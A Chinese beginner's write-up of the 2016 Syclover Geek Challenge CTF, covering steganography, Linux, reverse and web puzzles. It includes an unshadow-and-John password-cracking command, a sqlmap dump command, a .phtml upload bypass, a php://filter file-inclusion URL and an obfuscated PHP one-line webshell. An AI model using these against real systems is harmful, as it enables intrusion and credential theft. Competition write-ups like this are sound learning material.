2016第七季极客大挑战Writeup

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2016第七季极客大挑战Writeup相关的知识,希望对你有一定的参考价值。

     第一次接触CTF,只会做杂项和一点点Web题……因为时间比较仓促,写的比较简略。以后再写下工具使用什么的。

     纯新手,啥都不会。处于瑟瑟发抖的状态。

一、MISC

1.签到题

     直接填入题目所给的SYC{We1c0m3_To_G33k_2O!6}  

     并且可以知道后边的题的Flag格式为 SYC{}

 

2.xiao彩蛋

     题目提示关注微博,从Syclover Team 博客(http://blog.sycsec.com)可获取到三叶草小组微博,私信发送flag后即可得到。

  

3.闪的好快

      一开始拖进PS分帧数查看,发现二维码都是一半一半不完整的……直接找了个在线分解了一下,共18帧,一帧一阵扫即可。

 

4.Come_game

      打了一分钟就放弃了。手残党第一层三个刺那儿就过不去。关闭游戏后,发现生成两个文件,猜测DeadTime是保存死亡次数的,save1保存游戏关卡信息。

      删除后这两个文件后,观察发现进入死亡次数、时间信息时,生成DeadTime,进出关卡后生成save1。

      查看两个文件的修改时间(左为save1,右为DeadTime),在试玩时保持了在第一关存档点时不死亡,因此可以知道之前的猜测是正确的。

 技术分享

 

       用十六进制编辑器HexEditXP打开save1,修改关卡信息,尝试后发现共5关,修改即可。

 技术分享

 

5.Snow

     打开网页,查看源码得到key。

 技术分享

     提示是html隐写,通过关键词搜索,可以查到有snow隐写。将key和网址一并丢入解码网(http://fog.misty.com/perry/ccs/snow/snow/snow.html),就可以得到Flag。

 

6.旋转跳跃

     一个mp3文件,题目写着“熟悉的声音中貌似又隐藏着啥”,由题目信息,可以知道是MP3隐写,使用MP3stego(http://www.petitcolas.net/steganography/mp3stego/)可解。

 

7.凯撒部长的奖励

      给了一串类似于Flag格式的字符串,结合题目“凯撒”,可以知道是凯撒加密,以Flag格式可知需要将MSW移至SYC,即右移6位即可。可以写代码跑,也可以丢进相关的解密网站跑。

 

8.MD5cracker

      给定字符串01540f319ff0cf88928c83de23l27fbb,根据题目提示进行MD5解密查询,发现无效。观察发现其中有个l,改为1,再次查询解密后得到Flag。

 技术分享

 

9.PEN_AND_APPLE

      给了一段极其羞耻的MP4格式的视频,由于是MISC题,联想到视频隐写,搜索之,但只查到WAV格式的。提示是Windows下命令行,查阅《数据隐藏技术解密》一书的Windows相关内容,了解到是NTFS数据流隐写。

 技术分享

 

    通过搜索可知使用相关工具进行解密。但第一次尝试时未出Flag,反而出现了自己在动手实验时修改过的隐藏内容(然后把自己给误导了)……

 技术分享

    查阅后发现只能用WinRar进行解压,否则会使隐藏文件损失。

    可以在命令行下提取(使用lads和streams进行操作)或者使用NTFS Stream Info工具查看。

 

10.藏着小秘密的流量包

      下载后发现是pcapng文件,根据提示“用手机共享”,搜索蓝牙传输协议,即OBEX,用WireShark分析,定位可以看到,传输了一个名为“secret.rar”的压缩包,提取出来就能得到Flag。

     

二、Linux

1.linux_1

      在Ubuntu环境下进入docker,在 /usr/local/etc/geek/ 下取出第一个Flag。

2.linux_2

      通过docker目录文件查看,发现有个Flag2.swp,以“swp文件”为关键词进行搜索,查到这是vi非正常退出而产生的swp文件,通过vi -r {your file name} 这个命令可以恢复。

3.linux_3

     题目描述flag是某用户的登陆密码,通过Docker下查询发现有个用户名与syc相关的。

     linux下用户密码的储存位置是/etc/passwd以及/etc/shadow

     提取出来后,使用工具John,写字典进行爆破即可。

     unshadow /etc/passwd /etc/shadow > mypasswd

 技术分享

参考资料:http://www.cnblogs.com/iamstudy/articles/linux_password_shadow.html 

              http://www.heblug.org/chinese_docker/userguide/

              http://blog.csdn.net/lingdxuyan/article/details/4993868 

 

三、Program

compress300

      题目是一个300层的压缩包,且压缩包内文件无后缀名。

      偷懒直接用了个按键精灵,不断解压、修改文件后缀。得到Flag。

 

四、Reverse

re10-一起嗨皮

      只会这个。觉得逆向学习周期太长,听了一位师傅的建议,暂时先放下了RE。

      这题用OD找到字符串就可以啦……

 

五、Web

1.web_1

    F12看一下HTTP响应头,得到Flag。

 技术分享

 

2.web_2

     打开网页,提示not admin

     技术分享

 

     抓包,改一下whoami和root即可。

 技术分享

 

3.Social Engineering

     一道社工题。

 技术分享

 

      通过在线社工库,用邮箱查询可以知道邮箱主人的姓名是“肖力”,下边提示说“有贴吧的伪男”,进入 百度“肖力吧”,可以看到在有一贴子在比赛时间点时发布,提供了一个QQ号。查看该QQ号内容。发现发了一张图……还以为是图片隐写,尝试无果。

 技术分享

  于是查看留言板内容,发现提示域名的注册人联系号码就是Flag。然后上万网查询比赛官网WHOIS得到答案。

 

4.sqli1

      查看源码,有个tips。

 技术分享

     可以得到参数是sycid,使用SQLMAP对该网址

    (http://web.sycsec.com/d03e52c272e42e7c/?sycid=1)尝试注入(在Linux环境下)。

     检测注入点——爆库——爆表段——爆字段——Dump。

     sqlmap -u "http://web.sycsec.com/d03e52c272e42e7c/?sycid=1" -D sycsqli1 -T “#FL4G#” --columns 

     这里#FL4G#需要加个引号包含这个字段。

 

参考资料:http://nouername.github.io/2016/06/17/sql注入/ 

              https://www.nigesb.com/sqlmap-common-usage-and-examples.html 

              http://www.legendsec.org/1111.html 

          

5.sqli2

    使用Burp抓包,改Debug=1 

    通过逻辑运算符XOR,使用万能密码,返回1即可

 

6.人生苦短

     “交提”计算结果后查看源代码,得到一大串编码,使用在线解码,发现是Base64和Base32转来转去,可以用Python调用内置的模块进行解码。

 

7.狗师傅的计算器

     写Writeup的时候已经无法访问这个网页了,只能回忆一下。

     打开后发现是健脑操的一段代码。使用在线解码,得到一个welcome.php页面。

     进入这个welcome页面,随意输入答案后,得到两个链接,有一个链接是robot.txt,联想到网站的robots协议,进入一下这个地址。

     查看这个页面的内容,然后查询资料,有个include,知道这是一个文件包含。

     参考http://www.cnblogs.com/iamstudy/articles/include_file.html ,查询php相关的内容,多次尝试得到一串编码,解密后得到Flag。

 

8.上传1

    看题目后,搜索文件上传漏洞。尝试上传一句话php,提示类型不支持。说明php后缀过滤,查看资料,说是phpstudy可以使用 .php/.php3/.php4/.phtml上传,经过测试,发现.phtml有效。

    使用Burp改成.phtml后上传即可。

 技术分享

参考资料:

http://www.icookie.org/文件上传.html 

http://wenku.baidu.com/link?url=wx-44Vq4vEpWGOOVYj9ILZlulUiYDFEbCE5_siaZYdeZJ3g6vvudWNLbMnv5hXvpFYSprWkDUBtMYXk_wYka8VxhwIzETGVAtliBRS783j7 

 

9.文件上传2

      上传成功后,应当getshell了。

      随意上传了一个一句话,访问地址,发现页面上直接显示出php代码了,调的脚本里,’php’被替换掉了,导致一句话无法写入。然而依然不会做。

      之后经一位师傅提示,使用<script>的一句话绕过上传,使用菜刀连接了。

      具体是哪句,不知道丢在哪儿了……所以没交给主办方……

 

——————————————————————

比赛官方推荐的学习链接:

== web ==

文件包含:http://www.cnblogs.com/iamstudy/articles/include_file.html

sql注入:http://www.cnblogs.com/lcamry/category/846064.html

sqli1/sqli2

xss:https://github.com/l3m0n/XSS-Filter-Evasion-Cheat-Sheet-CN

文件上传:http://wenku.baidu.com/link?url=wx-44Vq4vEpWGOOVYj9ILZlulUiYDFEbCE5_siaZYdeZJ3g6vvudWNLbMnv5hXvpFYSprWkDUBtMYXk_wYka8VxhwIzETGVAtliBRS783j7

代码审计:http://wooyun.jozxing.cc/static/drops/papers-4544.html


<script language="pHp">$k="ass"."ert"; $k(${"_PO"."ST"} [‘8‘]);</script>
菜刀

game.sycsec.com:50085/result.php?syc=php://filter/convert.base64-encode/resource=syc

== misc ==

隐写术:http://www.jianshu.com/p/67233f607f75
snow\\旋转跳跃

编码与加密:http://www.tuicool.com/articles/2E3INnm
凯撒部长的奖励

== writeup ==

第五届极客大挑战:http://wooyun.jozxing.cc/static/drops/tips-3434.html
第六届极客大挑战:http://www.tuicool.com/articles/JfqMrq2






以上是关于2016第七季极客大挑战Writeup的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF-[极客大挑战 2019]PHP1

[极客大挑战 2019]EasySQL

BUUCTF-web

pwn2022 极客大挑战

pwn2022 极客大挑战

MySQL注入 [极客大挑战 2019]HardSQL